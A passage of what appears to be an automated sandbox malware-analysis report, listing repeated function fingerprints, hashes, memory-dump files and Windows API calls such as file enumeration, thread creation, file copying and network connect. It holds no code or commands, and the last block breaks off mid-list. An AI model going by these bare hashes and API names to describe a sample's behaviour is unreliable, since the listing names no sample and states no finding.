                                                                                                                                                                        • Instruction ID: 3520df9adbbd323b373b410989b7161841884cfbbf42a882757224e3c827b033
                                                                                                                                                                        • Opcode Fuzzy Hash: a6db715217e1f96c528aa59cd035334b4a03f76ba9324f30c828fcdbcc1cefb8
                                                                                                                                                                        • Instruction Fuzzy Hash: 75211B76305204AFC700DF6CDC94A29BBE5BBCD304F45456CE905CB364E6B4AA059F1A
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 0042142A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindNext
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2029273394-0
                                                                                                                                                                        • Opcode ID: b503dc445fca873ed39c848f2cd8d2fc334865c888b7dcedd4ed15ac09cf0625
                                                                                                                                                                        • Instruction ID: 239a21a1daea632ebc0b31b079475a1fa8e58ed3985d42a87e4d3925a719045c
                                                                                                                                                                        • Opcode Fuzzy Hash: b503dc445fca873ed39c848f2cd8d2fc334865c888b7dcedd4ed15ac09cf0625
                                                                                                                                                                        • Instruction Fuzzy Hash: 98212A72612845DFDB04DFACEC88E9C77F0FF68204B004069E855CB361EA79AE16CB04
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 004250C5
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindNext
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2029273394-0
                                                                                                                                                                        • Opcode ID: 49fdab04925f51947973e7b8627436ac063d2349d2956990db130b649acddf2b
                                                                                                                                                                        • Instruction ID: 3f433dbc34a3959e50b9b332797a7018e54b958f0fab15bb96115deec9a10e21
                                                                                                                                                                        • Opcode Fuzzy Hash: 49fdab04925f51947973e7b8627436ac063d2349d2956990db130b649acddf2b
                                                                                                                                                                        • Instruction Fuzzy Hash: EA316F7A601605EFD704CF68CD84BAAB7B0FF49308F049529E859D7220EBB1BE54CB91
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: InternetOpen
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2038078732-0
                                                                                                                                                                        • Opcode ID: 5a2dae33c1122239a1467a38b4929007afad54bd86b24ca38b5b100568cd55b3
                                                                                                                                                                        • Instruction ID: d799e9cda3f15cb694ab0866f120829321f9a12d57094e41915ee2447f8f2554
                                                                                                                                                                        • Opcode Fuzzy Hash: 5a2dae33c1122239a1467a38b4929007afad54bd86b24ca38b5b100568cd55b3
                                                                                                                                                                        • Instruction Fuzzy Hash: C321A131A102188FCB00EFA8DC80E9A77F5FF8C304B148128E95597322FBB0A906CF95
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 0042142A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindNext
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2029273394-0
                                                                                                                                                                        • Opcode ID: f94e7b3d022389a3db51987f4b578fd71536007f05d70185921091cb92e205f0
                                                                                                                                                                        • Instruction ID: f95ab065ed8fd6f8000524d0835f4e5e4540767b4c463b1568e3ad28de1d330f
                                                                                                                                                                        • Opcode Fuzzy Hash: f94e7b3d022389a3db51987f4b578fd71536007f05d70185921091cb92e205f0
                                                                                                                                                                        • Instruction Fuzzy Hash: 9F213EBA601500DFD709DBA8ED85E9977E2BB98200B048968F945D7350FAB9ED05CB44
                                                                                                                                                                        APIs
                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,Function_0003C9E3,?,00000000,00000000), ref: 00439074
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CreateThread
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2422867632-0
                                                                                                                                                                        • Opcode ID: d6bf4fa21a11a3a7220bd230ff66cf9595e9db0df3ec1bd7752baf03e3a7f0b3
                                                                                                                                                                        • Instruction ID: e3506f95033f00cab17ad5bc1c229d55bfa8fafd69c9f2a66d76e585097e9337
                                                                                                                                                                        • Opcode Fuzzy Hash: d6bf4fa21a11a3a7220bd230ff66cf9595e9db0df3ec1bd7752baf03e3a7f0b3
                                                                                                                                                                        • Instruction Fuzzy Hash: B41156723042049FD308DB5DEC91E29B3E9FFD4218B19452DE955C3361EAB4AD158B1A
                                                                                                                                                                        APIs
                                                                                                                                                                        • FindNextFileA.KERNELBASE(?,?), ref: 00439A2D
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: FileFindNext
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2029273394-0
                                                                                                                                                                        • Opcode ID: b438428d157cd66d71cb0828d441a37b17b3d8ee3bbcd0895725693cc8ecd222
                                                                                                                                                                        • Instruction ID: e4def7cd09edcfc11ee4b9b853d98a94c883cedba2ebadb4e32f7ccac4a777f3
                                                                                                                                                                        • Opcode Fuzzy Hash: b438428d157cd66d71cb0828d441a37b17b3d8ee3bbcd0895725693cc8ecd222
                                                                                                                                                                        • Instruction Fuzzy Hash: 9F21C774E00609CFDB55CF68D991AAAB7F1BF48300F008669E959E7351E770A980CF95
                                                                                                                                                                        APIs
                                                                                                                                                                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00424DDC
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: CopyFile
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1304948518-0
                                                                                                                                                                        • Opcode ID: d42fe108fb75e992fce4fc041ae50da4a516ce8acce98eb3a0a451b8153a5388
                                                                                                                                                                        • Instruction ID: 98a6f852cb3f405345897847997eb07c588c6b404fc588ce73a26b59723b40e9
                                                                                                                                                                        • Opcode Fuzzy Hash: d42fe108fb75e992fce4fc041ae50da4a516ce8acce98eb3a0a451b8153a5388
                                                                                                                                                                        • Instruction Fuzzy Hash: AD015EBA715111AFD704DB28DE89A6877E6EB8D2083045064E901D7364E6E2ED11CB85
                                                                                                                                                                        APIs
                                                                                                                                                                        • connect.WS2_32(?,?,00000010), ref: 0041B120
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000514000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000051D000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000523000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005E5000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000005F2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000067C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754716096.0000000000680000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_15_2_400000_25aac720-4b65-4596-94df-b9a776dc62c7.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: connect
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1959786783-0
                                                                                                                                                                        • Opcode ID: 45d6ea60cf5e0b7262ad2d0a16204e3a2a8c639939ae2b066bfc23b685f8a423
                                                                                                                                                                        • Instruction ID: a1ff9aa1605480642b7ff2df6056a6ea35e11b99697e623cf3ca73c7a8472b43
                                                                                                                                                                        • Opcode Fuzzy Hash: 45d6ea60cf5e0b7262ad2d0a16204e3a2a8c639939ae2b066bfc23b685f8a423
                                                                                                                                                                        • Instruction Fuzzy Hash: CE011DB52042109FC328CF29DD81D1BB7E5FF88304B14891DE4A9C7351E7B5E841CB59
                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 0000000F.00000002.2754135345.0000000000401000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 0000000F.00000002.2754107533.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754246928.000000000044C000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754274372.000000000045C000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.000000000046F000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.0000000000493000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004BD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C2000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004C6000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004F3000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                        • Associated: 0000000F.00000002.2754299649.00000000004FB000.00000004.00000001.01000000.00000008.sdmpDownload File
